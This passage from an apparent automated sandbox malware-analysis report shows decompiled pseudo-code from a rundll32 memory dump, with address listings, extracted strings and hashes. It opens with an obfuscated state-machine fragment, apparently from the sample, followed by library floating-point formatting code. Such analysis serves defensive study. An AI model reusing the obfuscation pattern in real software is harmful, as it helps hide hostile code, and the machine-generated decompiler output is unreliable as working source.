				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00B28736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E00B359A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E00B359A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x00b2ea50
0x00b2ea57
0x00b2ea5b
0x00b2ea5d
0x00b2ea5e
0x00b2ea62
0x00b2ea66
0x00b2ea68
0x00b2ea6d
0x00b2ea75
0x00b2ea77
0x00b2ea7b
0x00b2ea7e
0x00b2ea88
0x00b2ea90
0x00b2ea95
0x00b2ea9a
0x00b2eaa2
0x00b2eaaa
0x00b2eab2
0x00b2eab7
0x00b2eac6
0x00b2eac9
0x00b2eacd
0x00b2ead5
0x00b2eadd
0x00b2eae2
0x00b2eaea
0x00b2eaf2
0x00b2eafa
0x00b2eb0a
0x00b2eb0e
0x00b2eb16
0x00b2eb1e
0x00b2eb22
0x00b2eb27
0x00b2eb2f
0x00b2eb37
0x00b2eb3f
0x00b2eb4c
0x00b2eb4d
0x00b2eb51
0x00b2eb59
0x00b2eb61
0x00b2eb6f
0x00b2eb73
0x00b2eb7b
0x00b2eb88
0x00b2eb8c
0x00b2eb94
0x00b2eb9c
0x00b2eba4
0x00b2ebb1
0x00b2ebb5
0x00b2ebbd
0x00b2ebc5
0x00b2ebcd
0x00b2ebd5
0x00b2ebe2
0x00b2ebe6
0x00b2ebee
0x00b2ebf6
0x00b2ebfe
0x00b2ec06
0x00b2ec10
0x00b2ec15
0x00b2ec1d
0x00b2ec25
0x00b2ec2d
0x00b2ec35
0x00b2ec3a
0x00b2ec42
0x00b2ec50
0x00b2ec55
0x00b2ec5b
0x00b2ec60
0x00b2ec68
0x00b2ec70
0x00b2ec78
0x00b2ec84
0x00b2ec89
0x00b2ec8f
0x00b2ec97
0x00b2eca3
0x00b2eca8
0x00b2ecae
0x00b2ecb6
0x00b2ecbe
0x00b2ecca
0x00b2eccf
0x00b2ecd9
0x00b2ece1
0x00b2ecea
0x00b2ecee
0x00b2ecf6
0x00b2ecf6
0x00b2ed04
0x00b2ed65
0x00b2ed66
0x00b2ed70
0x00b2ed76
0x00b2ed78
0x00000000
0x00b2ed78
0x00b2ed06
0x00b2ed0c
0x00b2ed46
0x00b2ed4b
0x00b2ed50
0x00b2ed52
0x00000000
0x00b2ed52
0x00b2ed0e
0x00b2ed14
0x00000000
0x00b2ed1a
0x00b2ed1a
0x00000000
0x00b2ed1a
0x00b2ed14
0x00b2ed0c
0x00000000
0x00b2ed04
0x00b2eda3
0x00b2edaf
0x00b2edb2
0x00b2edb4
0x00b2edb9
0x00b2edb9
0x00b2edc6
0x00b2edce

Strings

)?, xrefs: 00B2EC42
dR, xrefs: 00B2EC60
--0, xrefs: 00B2ED0E
9v, xrefs: 00B2EBCD
n, xrefs: 00B2EA88
<q7, xrefs: 00B2EBC5
T8T, xrefs: 00B2EB51
--0, xrefs: 00B2EA90

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: n$)?$9v$<q7$dR$--0$--0$T8T
API String ID: 0-1820671589
Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction ID: c132a9916fecacbabe63e278580d02e3de0d2222c6b3862fdf9e8c8890ba83c2
Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
Instruction Fuzzy Hash: 0E9142714093419BD368CF62C98981FFBF1FBC5B58F405A1DF29A9A260C7B6CA058F46

Uniqueness

Uniqueness Score: -1.00%

Function 1003628F, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 77%

			E1003628F(void* __ebx, signed int __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, signed int _a20, intOrPtr _a24) {
				signed int _v0;
				signed int _v8;
				signed int _v464;
				void _v468;
				signed int _v472;
				char _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1868;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				intOrPtr _v1888;
				signed int _v1892;
				signed int _v1896;
				signed int _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1928;
				char _v1932;
				signed int _v1940;
				signed int _v1944;
				char _v2404;
				signed int _v2408;
				signed int _v2424;
				void* __edi;
				void* __ebp;
				signed int _t798;
				intOrPtr _t808;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				intOrPtr _t822;
				intOrPtr* _t823;
				intOrPtr* _t826;
				signed int _t832;
				signed int _t834;
				signed int _t841;
				signed int _t846;
				intOrPtr _t852;
				void* _t853;
				signed int _t859;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t868;
				signed int _t870;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t882;
				signed int _t885;
				signed int _t888;
				signed int _t893;
				signed int _t894;
				signed int _t901;
				signed int _t904;
				signed int _t908;
				char* _t911;
				signed int _t914;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				char* _t929;
				signed char _t931;
				signed int _t936;
				signed int _t938;
				signed int _t942;
				signed int _t945;
				signed int _t952;
				signed int _t955;
				signed int _t957;
				signed int _t960;
				signed int _t967;
				signed int _t968;
				signed int _t971;
				signed int _t984;
				signed int _t985;
				signed int _t986;
				signed int _t987;
				signed int* _t988;
				signed char _t990;
				signed int* _t993;
				signed int _t995;
				signed int _t997;
				signed int _t1001;
				signed int _t1004;
				signed int _t1011;
				signed int _t1014;
				signed int _t1017;
				signed int _t1020;
				signed int _t1027;
				intOrPtr _t1031;
				signed int _t1032;
				signed int _t1038;
				void* _t1045;
				signed int _t1046;
				signed int _t1047;
				signed int _t1048;
				signed int _t1051;
				signed int _t1057;
				signed int _t1061;
				signed int _t1063;
				signed int _t1068;
				void* _t1074;
				signed int _t1075;
				signed int _t1076;
				signed int _t1077;
				signed int _t1080;
				signed int _t1084;
				signed int _t1085;
				signed int _t1089;
				signed int _t1091;
				signed int _t1096;
				signed char _t1103;
				signed int _t1109;
				intOrPtr* _t1116;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1145;
				signed int _t1146;
				signed int _t1147;
				signed int _t1149;
				signed int _t1150;
				signed int _t1151;
				signed int _t1152;
				signed int _t1154;
				signed int _t1155;
				signed int _t1156;
				signed int _t1158;
				signed int _t1159;
				unsigned int _t1160;
				unsigned int _t1164;
				unsigned int _t1167;
				signed int _t1168;
				signed int _t1171;
				signed int* _t1174;
				signed int _t1177;
				void* _t1179;
				unsigned int _t1180;
				signed int _t1181;
				signed int _t1184;
				signed int* _t1187;
				signed int _t1190;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1199;
				signed int _t1204;
				signed int _t1205;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1215;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1223;
				void* _t1224;
				signed int _t1225;
				signed int _t1227;
				signed int _t1232;
				intOrPtr _t1237;
				signed int _t1238;
				void* _t1243;
				unsigned int _t1246;
				signed int _t1247;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				void* _t1264;
				void* _t1267;
				signed int _t1269;
				signed int _t1273;
				signed int _t1275;
				signed int _t1279;
				signed int _t1281;
				signed int _t1282;
				intOrPtr _t1284;
				intOrPtr _t1285;
				signed int _t1288;
				signed int _t1289;
				signed int _t1291;
				void* _t1294;
				signed int _t1296;
				signed int _t1297;
				signed int _t1299;
				signed int _t1300;
				signed int _t1302;
				signed int _t1309;
				void* _t1311;
				signed int* _t1312;
				signed int* _t1316;
				signed int _t1319;
				signed int _t1328;

				_t1193 = __edx;
				_t798 =  *0x1004d054; // 0xd94e5c04
				_v8 = _t798 ^ _t1309;
				_v1928 = _a16;
				_v1896 = _a20;
				E1003A2F1(__eflags,  &_v1940);
				_t1103 = 1;
				if((_v1940 & 0x0000001f) != 0x1f) {
					E1003A359(__eflags,  &_v1940);
					_v1932 = 1;
				} else {
					_v1932 = 0;
				}
				_t1281 = _a8;
				_t1237 = 0x20;
				_t1319 = _t1281;
				if(_t1319 > 0 || _t1319 >= 0 && _a4 >= 0) {
					_t808 = _t1237;
				} else {
					_t808 = 0x2d;
				}
				_t1116 = _v1928;
				 *_t1116 = _t808;
				 *((intOrPtr*)(_t1116 + 8)) = _v1896;
				E1003A292( &_v1944, 0, 0);
				_t1312 = _t1311 + 0xc;
				if((_t1281 & 0x7ff00000) != 0) {
					L14:
					_t815 = E1002D1D5( &_a4);
					_pop(_t1119);
					__eflags = _t815;
					if(_t815 != 0) {
						_t1119 = _v1928;
						 *((intOrPtr*)(_v1928 + 4)) = _t1103;
					}
					_t816 = _t815 - 1;
					__eflags = _t816;
					if(_t816 == 0) {
						_t817 = E100120A5(_v1896, _a24, "1#INF");
						__eflags = _t817;
						if(_t817 != 0) {
							goto L311;
						} else {
							_t1103 = 0;
							__eflags = 0;
							goto L308;
						}
					} else {
						_t832 = _t816 - 1;
						__eflags = _t832;
						if(_t832 == 0) {
							_push("1#QNAN");
							goto L12;
						} else {
							_t834 = _t832 - 1;
							__eflags = _t834;
							if(_t834 == 0) {
								_push("1#SNAN");
								goto L12;
							} else {
								__eflags = _t834 == 1;
								if(_t834 == 1) {
									_push("1#IND");
									goto L12;
								} else {
									_v1920 = _v1920 & 0x00000000;
									_a8 = _t1281 & 0x7fffffff;
									_t1328 = _a4;
									asm("fst qword [ebp-0x75c]");
									_t1288 = _v1884;
									_v1916 = _a12 + 1;
									_t1124 = _t1288 >> 0x14;
									_t841 = _t1124 & 0x000007ff;
									__eflags = _t841;
									if(_t841 != 0) {
										_t841 = 0;
										_t1194 = 0x100000;
										_t39 =  &_v1876;
										 *_t39 = _v1876 & 0;
										__eflags =  *_t39;
									} else {
										_t1194 = 0;
										_v1876 = _t1103;
									}
									_t1289 = _t1288 & 0x000fffff;
									_v1912 = _v1888 + _t841;
									asm("adc esi, edx");
									_t1125 = _t1124 & 0x000007ff;
									_v1868 = _v1876 + _t1125;
									E1003A3B0(_t1125, _t1328);
									_push(_t1125);
									_push(_t1125);
									 *_t1312 = _t1328;
									E1003A4C0(_t1125);
									_t846 = E1003FA10(_t1194);
									_v1904 = _t846;
									_t1243 = 0x20;
									__eflags = _t846 - 0x7fffffff;
									if(_t846 == 0x7fffffff) {
										L25:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t846 - 0x80000000;
										if(_t846 == 0x80000000) {
											goto L25;
										}
									}
									_t1195 = _v1868;
									__eflags = _t1289;
									_v468 = _v1912;
									_v464 = _t1289;
									_t1130 = (0 | _t1289 != 0x00000000) + 1;
									_v1892 = _t1130;
									_v472 = _t1130;
									__eflags = _t1195 - 0x433;
									if(_t1195 < 0x433) {
										__eflags = _t1195 - 0x35;
										if(_t1195 == 0x35) {
											L96:
											__eflags = _t1289;
											_t209 =  &_v1884;
											 *_t209 = _v1884 & 0x00000000;
											__eflags =  *_t209;
											_t852 =  *((intOrPtr*)(_t1309 + 4 + (0 | _t1289 != 0x00000000) * 4 - 0x1d4));
											asm("bsr eax, eax");
											if( *_t209 == 0) {
												_t853 = 0;
												__eflags = 0;
											} else {
												_t853 = _t852 + 1;
											}
											__eflags = _t1243 - _t853 - _t1103;
											asm("sbb esi, esi");
											_t1291 =  ~_t1289 + _t1130;
											__eflags = _t1291 - 0x73;
											if(_t1291 <= 0x73) {
												_t1196 = _t1291 - 1;
												__eflags = _t1196 - 0xffffffff;
												if(_t1196 != 0xffffffff) {
													_t222 = _t1196 - 1; // 0x23
													_t1264 = _t222;
													while(1) {
														__eflags = _t1196 - _t1130;
														if(_t1196 >= _t1130) {
															_t1027 = 0;
															__eflags = 0;
														} else {
															_t1027 =  *(_t1309 + _t1196 * 4 - 0x1d0);
														}
														__eflags = _t1264 - _t1130;
														if(_t1264 >= _t1130) {
															_t1160 = 0;
															__eflags = 0;
														} else {
															_t1160 =  *(_t1309 + _t1196 * 4 - 0x1d4);
														}
														 *(_t1309 + _t1196 * 4 - 0x1d0) = _t1160 >> 0x0000001f | _t1027 + _t1027;
														_t1196 = _t1196 - 1;
														_t1264 = _t1264 - 1;
														__eflags = _t1196 - 0xffffffff;
														if(_t1196 == 0xffffffff) {
															goto L111;
														}
														_t1130 = _v472;
													}
												}
												L111:
												_v472 = _t1291;
											} else {
												_v1400 = _v1400 & 0x00000000;
												_v472 = _v472 & 0x00000000;
												_push(0);
												_push( &_v1396);
												_push(0x1cc);
												_push( &_v468);
												L312();
												_t1312 =  &(_t1312[4]);
											}
											_t1246 = 0x434 >> 5;
											E100050F0(0x434 >> 5,  &_v1396, 0, 0x434);
											__eflags = 1;
											 *(_t1309 + 0xbad63d) = 1 << (0x00000434 - _v1868 & 0x0000001f);
										} else {
											_v1396 = _v1396 & 0x00000000;
											_v1392 = 0x100000;
											_v1400 = 2;
											__eflags = _t1289;
											if(_t1289 != 0) {
												_t1224 = 0;
												__eflags = 0;
												while(1) {
													_t1031 =  *((intOrPtr*)(_t1309 + _t1224 - 0x570));
													__eflags = _t1031 -  *((intOrPtr*)(_t1309 + _t1224 - 0x1d0));
													if(_t1031 !=  *((intOrPtr*)(_t1309 + _t1224 - 0x1d0))) {
														goto L96;
													}
													_t1224 = _t1224 + 4;
													__eflags = _t1224 - 8;
													if(_t1224 != 8) {
														continue;
													} else {
														__eflags = 0;
														asm("bsr eax, esi");
														_v1884 = 0;
														if(0 == 0) {
															_t1032 = 0;
														} else {
															_t1032 = _t1031 + 1;
														}
														__eflags = _t1243 - _t1032 - 2;
														asm("sbb esi, esi");
														_t1302 =  ~_t1289 + _t1130;
														__eflags = _t1302 - 0x73;
														if(_t1302 <= 0x73) {
															_t1225 = _t1302 - 1;
															__eflags = _t1225 - 0xffffffff;
															if(_t1225 != 0xffffffff) {
																_t191 = _t1225 - 1; // 0x23
																_t1267 = _t191;
																while(1) {
																	__eflags = _t1225 - _t1130;
																	if(_t1225 >= _t1130) {
																		_t1038 = 0;
																	} else {
																		_t1038 =  *(_t1309 + _t1225 * 4 - 0x1d0);
																	}
																	__eflags = _t1267 - _t1130;
																	if(_t1267 >= _t1130) {
																		_t1164 = 0;
																	} else {
																		_t1164 =  *(_t1309 + _t1225 * 4 - 0x1d4);
																	}
																	 *(_t1309 + _t1225 * 4 - 0x1d0) = _t1164 >> 0x0000001e | _t1038 << 0x00000002;
																	_t1225 = _t1225 - 1;
																	_t1267 = _t1267 - 1;
																	__eflags = _t1225 - 0xffffffff;
																	if(_t1225 == 0xffffffff) {
																		goto L94;
																	}
																	_t1130 = _v472;
																}
															}
															L94:
															_v472 = _t1302;
														} else {
															_push(0);
															_v1400 = 0;
															_push( &_v1396);
															_v472 = 0;
															_push(0x1cc);
															_push( &_v468);
															L312();
															_t1312 =  &(_t1312[4]);
														}
														_t1246 = 0x435 >> 5;
														E100050F0(0x435 >> 5,  &_v1396, 0, 0x435);
														 *(_t1309 + 0xbad63d) = 1 << (0x00000435 - _v1868 & 0x0000001f);
													}
													goto L113;
												}
											}
											goto L96;
										}
										L113:
										_t859 = _t1246 + 1;
										_t1294 = 0x1cc;
										_v1400 = _t859;
										_v936 = _t859;
										_push(_t859 << 2);
										_push( &_v1396);
										_push(0x1cc);
										_push( &_v932);
										L312();
										_t1316 =  &(_t1312[7]);
										_t1103 = 1;
										__eflags = 1;
									} else {
										_v1396 = _v1396 & 0x00000000;
										_v1392 = 0x100000;
										_v1400 = 2;
										__eflags = _t1289;
										if(_t1289 == 0) {
											L53:
											_t1167 = _t1195 - 0x432;
											_t1168 = _t1167 & 0x0000001f;
											_v1900 = _t1167 >> 5;
											_v1876 = _t1168;
											_v1920 = _t1243 - _t1168;
											_t1045 = E1003F970(_t1103, _t1243 - _t1168, 0);
											_t1227 = _v1892;
											_t1046 = _t1045 - 1;
											_t128 =  &_v1872;
											 *_t128 = _v1872 & 0x00000000;
											__eflags =  *_t128;
											_v1912 = _t1046;
											_t1047 =  !_t1046;
											_v1884 = _t1047;
											asm("bsr eax, ecx");
											if( *_t128 == 0) {
												_t136 =  &_v1880;
												 *_t136 = _v1880 & 0x00000000;
												__eflags =  *_t136;
											} else {
												_v1880 = _t1047 + 1;
											}
											_t1171 = _v1900;
											_t1294 = 0x1cc;
											_t1048 = _t1227 + _t1171;
											__eflags = _t1048 - 0x73;
											if(_t1048 <= 0x73) {
												__eflags = _t1243 - _v1880 - _v1876;
												asm("sbb eax, eax");
												_t1051 =  ~_t1048 + _t1227 + _t1171;
												_v1908 = _t1051;
												__eflags = _t1051 - 0x73;
												if(_t1051 > 0x73) {
													goto L57;
												} else {
													_t1269 = _t1171 - 1;
													_t1057 = _t1051 - 1;
													_v1872 = _t1269;
													_v1868 = _t1057;
													__eflags = _t1057 - _t1269;
													if(_t1057 != _t1269) {
														_t1273 = _t1057 - _t1171;
														__eflags = _t1273;
														_t1174 =  &(( &_v472)[_t1273]);
														_v1892 = _t1174;
														while(1) {
															__eflags = _t1273 - _t1227;
															if(_t1273 >= _t1227) {
																_t1061 = 0;
																__eflags = 0;
															} else {
																_t1061 = _t1174[1];
															}
															_v1880 = _t1061;
															_t156 = _t1273 - 1; // -4
															__eflags = _t156 - _t1227;
															if(_t156 >= _t1227) {
																_t1063 = 0;
																__eflags = 0;
															} else {
																_t1063 =  *_t1174;
															}
															_t1177 = _v1868;
															 *(_t1309 + _t1177 * 4 - 0x1d0) = (_t1063 & _v1884) >> _v1920 | (_v1880 & _v1912) << _v1876;
															_t1068 = _t1177 - 1;
															_t1174 = _v1892 - 4;
															_v1868 = _t1068;
															_t1273 = _t1273 - 1;
															_v1892 = _t1174;
															__eflags = _t1068 - _v1872;
															if(_t1068 == _v1872) {
																break;
															}
															_t1227 = _v472;
														}
														_t1171 = _v1900;
													}
													__eflags = _t1171;
													if(_t1171 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1171 << 2);
														_t1312 =  &(_t1312[3]);
													}
													_v472 = _v1908;
												}
											} else {
												L57:
												_push(0);
												_v1400 = 0;
												_v472 = 0;
												_push( &_v1396);
												_push(_t1294);
												_push( &_v468);
												L312();
												_t1312 =  &(_t1312[4]);
											}
											_v1396 = 2;
											_push(4);
										} else {
											_t1179 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1309 + _t1179 - 0x570)) -  *((intOrPtr*)(_t1309 + _t1179 - 0x1d0));
												if( *((intOrPtr*)(_t1309 + _t1179 - 0x570)) !=  *((intOrPtr*)(_t1309 + _t1179 - 0x1d0))) {
													goto L53;
												}
												_t1179 = _t1179 + 4;
												__eflags = _t1179 - 8;
												if(_t1179 != 8) {
													continue;
												} else {
													_t1180 = _t1195 - 0x431;
													_t1181 = _t1180 & 0x0000001f;
													_v1880 = _t1180 >> 5;
													_v1900 = _t1181;
													_v1872 = _t1243 - _t1181;
													_t1074 = E1003F970(_t1103, _t1243 - _t1181, 0);
													_t1232 = _v1892;
													_t1075 = _t1074 - 1;
													_t68 =  &_v1884;
													 *_t68 = _v1884 & 0x00000000;
													__eflags =  *_t68;
													_v1908 = _t1075;
													_t1076 =  !_t1075;
													_v1912 = _t1076;
													asm("bsr eax, ecx");
													if( *_t68 == 0) {
														_t76 =  &_v1876;
														 *_t76 = _v1876 & 0x00000000;
														__eflags =  *_t76;
													} else {
														_v1876 = _t1076 + 1;
													}
													_t1184 = _v1880;
													_t1294 = 0x1cc;
													_t1077 = _t1232 + _t1184;
													__eflags = _t1077 - 0x73;
													if(_t1077 <= 0x73) {
														__eflags = _t1243 - _v1876 - _v1900;
														asm("sbb eax, eax");
														_t1080 =  ~_t1077 + _t1232 + _t1184;
														_v1884 = _t1080;
														__eflags = _t1080 - 0x73;
														if(_t1080 > 0x73) {
															goto L35;
														} else {
															_t1275 = _t1184 - 1;
															_t1085 = _t1080 - 1;
															_v1920 = _t1275;
															_v1868 = _t1085;
															__eflags = _t1085 - _t1275;
															if(_t1085 != _t1275) {
																_t1279 = _t1085 - _t1184;
																__eflags = _t1279;
																_t1187 =  &(( &_v472)[_t1279]);
																_v1892 = _t1187;
																while(1) {
																	__eflags = _t1279 - _t1232;
																	if(_t1279 >= _t1232) {
																		_t1089 = 0;
																		__eflags = 0;
																	} else {
																		_t1089 = _t1187[1];
																	}
																	_v1876 = _t1089;
																	_t96 = _t1279 - 1; // -4
																	__eflags = _t96 - _t1232;
																	if(_t96 >= _t1232) {
																		_t1091 = 0;
																		__eflags = 0;
																	} else {
																		_t1091 =  *_t1187;
																	}
																	_t1190 = _v1868;
																	 *(_t1309 + _t1190 * 4 - 0x1d0) = (_t1091 & _v1912) >> _v1872 | (_v1876 & _v1908) << _v1900;
																	_t1096 = _t1190 - 1;
																	_t1187 = _v1892 - 4;
																	_v1868 = _t1096;
																	_t1279 = _t1279 - 1;
																	_v1892 = _t1187;
																	__eflags = _t1096 - _v1920;
																	if(_t1096 == _v1920) {
																		break;
																	}
																	_t1232 = _v472;
																}
																_t1184 = _v1880;
															}
															__eflags = _t1184;
															if(_t1184 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1184 << 2);
																_t1312 =  &(_t1312[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_push(0);
														_v1400 = 0;
														_v472 = 0;
														_push( &_v1396);
														_push(_t1294);
														_push( &_v468);
														L312();
														_t1312 =  &(_t1312[4]);
													}
													_t1084 = 4;
													_v1396 = _t1084;
													_push(_t1084);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1103;
										_push(_t1294);
										_push( &_v932);
										_v1400 = _t1103;
										L312();
										_t1316 =  &(_t1312[4]);
									}
									_t863 = _v1904;
									_t1132 = 0xa;
									_v1912 = _t1132;
									__eflags = _t863;
									if(_t863 < 0) {
										_t864 =  ~_t863;
										_t865 = _t864 / _t1132;
										_v1892 = _t865;
										_t1133 = _t864 % _t1132;
										_v1920 = _t1133;
										__eflags = _t865;
										if(_t865 == 0) {
											L246:
											__eflags = _t1133;
											if(_t1133 != 0) {
												_t908 =  *(0x100493b4 + _t1133 * 4);
												_v1884 = _t908;
												__eflags = _t908;
												if(_t908 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t908 - _t1103;
													if(_t908 != _t1103) {
														_t1143 = _v472;
														__eflags = _t1143;
														if(_t1143 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1252 = 0;
															__eflags = 0;
															do {
																_t1209 = _t908 *  *(_t1309 + _t1252 * 4 - 0x1d0) >> 0x20;
																 *(_t1309 + _t1252 * 4 - 0x1d0) = _t908 *  *(_t1309 + _t1252 * 4 - 0x1d0) + _v1872;
																_t908 = _v1884;
																asm("adc edx, 0x0");
																_t1252 = _t1252 + 1;
																_v1872 = _t1209;
																__eflags = _t1252 - _t1143;
															} while (_t1252 != _t1143);
															__eflags = _t1209;
															if(_t1209 != 0) {
																_t914 = _v472;
																__eflags = _t914 - 0x73;
																if(_t914 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1309 + _t914 * 4 - 0x1d0) = _t1209;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t865 - 0x26;
												if(_t865 > 0x26) {
													_t865 = 0x26;
												}
												_t1144 =  *(0x1004931e + _t865 * 4) & 0x000000ff;
												_v1900 = _t865;
												_v1400 = ( *(0x1004931e + _t865 * 4) & 0x000000ff) + ( *(0x1004931f + _t865 * 4) & 0x000000ff);
												E100050F0(_t1144 << 2,  &_v1396, 0, _t1144 << 2);
												_t925 = E100045C0( &(( &_v1396)[_t1144]), 0x10048a18 + ( *(0x1004931c + _v1900 * 4) & 0x0000ffff) * 4, ( *(0x1004931f + _t865 * 4) & 0x000000ff) << 2);
												_t1255 = _v1400;
												_t1316 =  &(_t1316[6]);
												__eflags = _t1255 - _t1103;
												if(_t1255 > _t1103) {
													__eflags = _v472 - _t1103;
													if(_v472 > _t1103) {
														__eflags = _t1255 - _v472;
														_t1210 =  &_v1396;
														_t548 = _t1255 - _v472 > 0;
														__eflags = _t548;
														_t926 = _t925 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1210 =  &_v468;
														}
														_v1876 = _t1210;
														_t1145 =  &_v468;
														__eflags = _t926;
														if(_t926 == 0) {
															_t1145 =  &_v1396;
														}
														_v1872 = _t1145;
														__eflags = _t926;
														if(_t926 == 0) {
															_t1146 = _v472;
															_v1880 = _t1146;
														} else {
															_t1146 = _t1255;
															_v1880 = _t1255;
														}
														__eflags = _t926;
														if(_t926 != 0) {
															_t1255 = _v472;
														}
														_t927 = 0;
														_t1296 = 0;
														_v1864 = 0;
														__eflags = _t1146;
														if(_t1146 == 0) {
															L240:
															_v472 = _t927;
															_t1294 = 0x1cc;
															_t928 = _t927 << 2;
															__eflags = _t928;
															_push(_t928);
															_t929 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1210 + _t1296 * 4);
																if( *(_t1210 + _t1296 * 4) != 0) {
																	_t1213 = 0;
																	_t1147 = _t1296;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1255;
																	if(_t1255 == 0) {
																		L237:
																		__eflags = _t1147 - 0x73;
																		if(_t1147 == 0x73) {
																			goto L255;
																		} else {
																			_t1146 = _v1880;
																			_t1210 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1147 - 0x73;
																			if(_t1147 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1147 - _t927;
																			if(_t1147 == _t927) {
																				 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) & 0x00000000;
																				_t945 = _v1868 + 1 + _t1296;
																				__eflags = _t945;
																				_v1864 = _t945;
																			}
																			_t938 =  *(_v1872 + _v1868 * 4);
																			_t1215 = _v1876;
																			_t1213 = _t938 *  *(_t1215 + _t1296 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) + _t938 *  *(_t1215 + _t1296 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t942 = _v1868 + 1;
																			_t1147 = _t1147 + 1;
																			_v1868 = _t942;
																			__eflags = _t942 - _t1255;
																			_v1908 = _t1213;
																			_t927 = _v1864;
																			if(_t942 != _t1255) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1213;
																				if(_t1213 == 0) {
																					goto L237;
																				}
																				__eflags = _t1147 - 0x73;
																				if(_t1147 == 0x73) {
																					L255:
																					_t1294 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1147 - _t927;
																					if(_t1147 == _t927) {
																						_t604 = _t1309 + _t1147 * 4 - 0x740;
																						 *_t604 =  *(_t1309 + _t1147 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1147 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t936 = _t1213;
																					_t1213 = 0;
																					 *(_t1309 + _t1147 * 4 - 0x740) =  *(_t1309 + _t1147 * 4 - 0x740) + _t936;
																					_t927 = _v1864;
																					asm("adc edx, edx");
																					_t1147 = _t1147 + 1;
																					continue;
																				}
																				goto L243;
																			}
